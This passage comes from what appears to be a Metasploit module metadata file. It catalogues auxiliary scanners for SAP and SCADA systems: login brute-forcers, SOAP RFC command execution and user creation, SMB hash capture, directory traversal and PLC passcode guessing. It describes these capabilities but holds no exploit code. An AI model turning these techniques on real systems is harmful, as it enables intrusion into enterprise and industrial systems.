"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to output a list of available\n logfiles and developer tracefiles through the SAP Management\n Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_listlogfiles",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_startprofile": {
"name": "SAP Management Console getStartProfile",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_startprofile",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to access the SAP startup profile\n through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_startprofile",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_mgmt_con_version": {
"name": "SAP Management Console Version Detection",
"full_name": "auxiliary/scanner/sap/sap_mgmt_con_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module simply attempts to identify the version of SAP\n through the SAP Management Console SOAP Interface.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_mgmt_con_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_router_info_request": {
"name": "SAPRouter Admin Request",
"full_name": "auxiliary/scanner/sap/sap_router_info_request",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Mariano Nunez",
"nmonkee"
],
"description": "Display the remote connection table from a SAPRouter.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/",
"URL-http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm",
"URL-http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf"
],
"platform": "",
"arch": "",
"rport": 3299,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_router_info_request.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_router_info_request",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_router_portscanner": {
"name": "SAPRouter Port Scanner",
"full_name": "auxiliary/scanner/sap/sap_router_portscanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bruno Morisson <bm@integrity.pt>",
"nmonkee"
],
"description": "This module allows for mapping ACLs and identifying open/closed ports accessible\n on hosts through a SAProuter.",
"references": [
"URL-http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm",
"URL-http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm",
"URL-http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/",
"URL-http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf",
"URL-http://scn.sap.com/docs/DOC-17124"
],
"platform": "",
"arch": "",
"rport": "3299",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_router_portscanner.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_router_portscanner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_service_discovery": {
"name": "SAP Service Discovery",
"full_name": "auxiliary/scanner/sap/sap_service_discovery",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "Scans for listening SAP services.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_service_discovery.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_service_discovery",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_smb_relay": {
"name": "SAP SMB Relay Abuse",
"full_name": "auxiliary/scanner/sap/sap_smb_relay",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexey Tyurin",
"nmonkee"
],
"description": "This module provides several SMB relay abuse vectors through different SAP\n services and functions. The attack is done through specially crafted requests\n including a UNC path which will be accessed by the SAP system while trying to\n process the request. In order to capture the hashes the auxiliary/server/capture/smb\n module can be used.",
"references": [
"URL-http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity/",
"URL-https://service.sap.com/sap/support/notes/1597066"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_smb_relay.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_smb_relay",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_bapi_user_create1": {
"name": "SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation",
"full_name": "auxiliary/scanner/sap/sap_soap_bapi_user_create1",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the BAPI_USER_CREATE1 function, through the SOAP\n /sap/bc/soap/rfc service, for creating/modifying users on a SAP system.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_bapi_user_create1",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_brute_login": {
"name": "SAP SOAP Service RFC_PING Login Brute Forcer",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_brute_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module attempts to brute force SAP usernames and passwords through the\n /sap/bc/soap/rfc SOAP service, using the RFC_PING function.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_brute_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec": {
"name": "SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nmonkee"
],
"description": "This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the\n use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/",
"URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec": {
"name": "SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nmonkee"
],
"description": "This module makes use of the SXPG_COMMAND_EXEC Remote Function Call, through the\n use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/",
"URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_eps_get_directory_listing": {
"name": "SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver EPS_GET_DIRECTORY_LISTING function, on the\n SAP SOAP RFC Service, to check for remote directory existence and get the number\n of entries in it. The module can also be used to capture SMB hashes by using a fake\n SMB share as DIR.",
"references": [
"URL-http://labs.mwrinfosecurity.com"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_eps_get_directory_listing",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_pfl_check_os_file_existence": {
"name": "SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexey Tyurin",
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver PFL_CHECK_OS_FILE_EXISTENCE function, on\n the SAP SOAP RFC Service, to check for files existence on the remote file system.\n The module can also be used to capture SMB hashes by using a fake SMB share as\n FILEPATH.",
"references": [
"OSVDB-78537",
"BID-51645",
"URL-http://erpscan.com/advisories/dsecrg-12-009-sap-netweaver-pfl_check_os_file_existence-missing-authorisation-check-and-smb-relay-vulnerability/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_pfl_check_os_file_existence",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_ping": {
"name": "SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_ping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the RFC_PING function, through the /sap/bc/soap/rfc\n SOAP service, to test connectivity to remote RFC destinations.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_ping",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_read_table": {
"name": "SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_read_table",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the RFC_READ_TABLE Function to read data from tables using\n the /sap/bc/soap/rfc SOAP service.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_read_table",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_rzl_read_dir": {
"name": "SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alexey Tyurin",
"nmonkee"
],
"description": "This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL function, on the SAP\n SOAP RFC Service, to enumerate directory contents. It returns only the first 32\n characters of the filename since they are truncated. The module can also be used to\n capture SMB hashes by using a fake SMB share as DIR.",
"references": [
"OSVDB-92732",
"URL-http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_rzl_read_dir",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_susr_rfc_user_interface": {
"name": "SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP\n /sap/bc/soap/rfc service, for creating/modifying users on a SAP system.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_susr_rfc_user_interface",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_sxpg_call_system_exec": {
"name": "SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the\n use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in\n the SM69 transaction.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_sxpg_call_system_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_sxpg_command_exec": {
"name": "SAP SOAP RFC SXPG_COMMAND_EXECUTE",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through\n the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured\n in the SM69 transaction.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_sxpg_command_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_rfc_system_info": {
"name": "SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering",
"full_name": "auxiliary/scanner/sap/sap_soap_rfc_system_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee",
"ChrisJohnRiley"
],
"description": "This module makes use of the RFC_SYSTEM_INFO Function to obtain the operating\n system version, SAP version, IP address and other information through the use of\n the /sap/bc/soap/rfc SOAP service.",
"references": [
"CVE-2006-6010",
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_rfc_system_info",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_soap_th_saprel_disclosure": {
"name": "SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure",
"full_name": "auxiliary/scanner/sap/sap_soap_th_saprel_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agnivesh Sathasivam",
"nmonkee"
],
"description": "This module attempts to identify software, OS and DB versions through the SAP\n function TH_SAPREL using the /sap/bc/soap/rfc SOAP service.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_soap_th_saprel_disclosure",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/sap/sap_web_gui_brute_login": {
"name": "SAP Web GUI Login Brute Forcer",
"full_name": "auxiliary/scanner/sap/sap_web_gui_brute_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nmonkee"
],
"description": "This module attempts to brute force SAP usernames and passwords through the SAP Web\n GUI service. Default clients can be tested without needing to set a CLIENT. Common\n and default user/password combinations can be tested by just setting the DEFAULT_CRED\n variable to true. The MSF_DATA_DIRECTORY/wordlists/sap_default.txt file\n stores these default combinations.",
"references": [
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb",
"is_install_path": true,
"ref_name": "scanner/sap/sap_web_gui_brute_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/digi_addp_reboot": {
"name": "Digi ADDP Remote Reboot Initiator",
"full_name": "auxiliary/scanner/scada/digi_addp_reboot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Reboot Digi International based equipment through the ADDP service",
"references": [
"URL-http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html",
"URL-http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29"
],
"platform": "",
"arch": "",
"rport": 2362,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/digi_addp_reboot.rb",
"is_install_path": true,
"ref_name": "scanner/scada/digi_addp_reboot",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/scada/digi_addp_version": {
"name": "Digi ADDP Information Discovery",
"full_name": "auxiliary/scanner/scada/digi_addp_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Discover host information through the Digi International ADDP service",
"references": [
"URL-http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html",
"URL-http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29"
],
"platform": "",
"arch": "",
"rport": 2362,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/digi_addp_version.rb",
"is_install_path": true,
"ref_name": "scanner/scada/digi_addp_version",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/scada/digi_realport_serialport_scan": {
"name": "Digi RealPort Serial Server Port Scanner",
"full_name": "auxiliary/scanner/scada/digi_realport_serialport_scan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Identify active ports on RealPort-enabled serial servers.",
"references": [
"URL-http://www.digi.com/pdf/fs_realport.pdf",
"URL-http://www.digi.com/support/productdetail?pid=2229&type=drivers"
],
"platform": "",
"arch": "",
"rport": 771,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb",
"is_install_path": true,
"ref_name": "scanner/scada/digi_realport_serialport_scan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/digi_realport_version": {
"name": "Digi RealPort Serial Server Version",
"full_name": "auxiliary/scanner/scada/digi_realport_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect serial servers that speak the RealPort protocol.",
"references": [
"URL-http://www.digi.com/pdf/fs_realport.pdf",
"URL-http://www.digi.com/support/productdetail?pid=2229&type=drivers"
],
"platform": "",
"arch": "",
"rport": 771,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/digi_realport_version.rb",
"is_install_path": true,
"ref_name": "scanner/scada/digi_realport_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/indusoft_ntwebserver_fileaccess": {
"name": "Indusoft WebStudio NTWebServer Remote File Access",
"full_name": "auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Indusoft WebStudio.\n The vulnerability exists in the NTWebServer component and allows reading arbitrary\n remote files with the privileges of the NTWebServer process. The module has been\n tested successfully on Indusoft WebStudio 6.1 SP6.",
"references": [
"CVE-2011-1900",
"OSVDB-73413",
"BID-47842",
"URL-http://www.indusoft.com/hotfixes/hotfixes.php"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/scada/indusoft_ntwebserver_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/koyo_login": {
"name": "Koyo DirectLogic PLC Password Brute Force Utility",
"full_name": "auxiliary/scanner/scada/koyo_login",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate to a locked Koyo DirectLogic PLC.\n The PLC uses a restrictive passcode, which can be A0000000 through A9999999.\n The \"A\" prefix can also be changed by the administrator to any other character,\n which can be set through the PREFIX option of this module.\n\n This module is based on the original 'koyobrute.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 28784,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/koyo_login.rb",
"is_install_path": true,
"ref_name": "scanner/scada/koyo_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/modbus_findunitid": {
"name": "Modbus Unit ID and Station ID Enumerator",
"full_name": "auxiliary/scanner/scada/modbus_findunitid",
"rank": 300,
"disclosure_date": "2012-10-28",
"type": "auxiliary",
"author": [
"EsMnemon <esm@mnemonic.no>"
],
"description": "Modbus is a cleartext protocol used in common SCADA systems, developed\n originally as a serial-line (RS232) async protocol, and later transformed\n to IP, which is called ModbusTCP. The default TCP port is 502.\n\n This module sends a command (0x04, read input register) to the Modbus endpoint.\n If this command is sent to the correct unit-id, it returns with the same function-id.\n If not, 0x80 should be added to it, so that it says 0x84, and an exception-code follows\n which does not interest us. This does not always happen, but at least the first 4\n bytes in the return-packet should be exactly the same as what was sent.\n\n You can change the port, IP and the scan-range for the unit-id. There is also a\n BENICE option to make the scanner sleep a second or more between probes. We\n have seen installations where scanning too many too fast works like a DoS.",
"references": [
"URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx",
"URL-http://en.wikipedia.org/wiki/Modbus:TCP"
],
"platform": "",
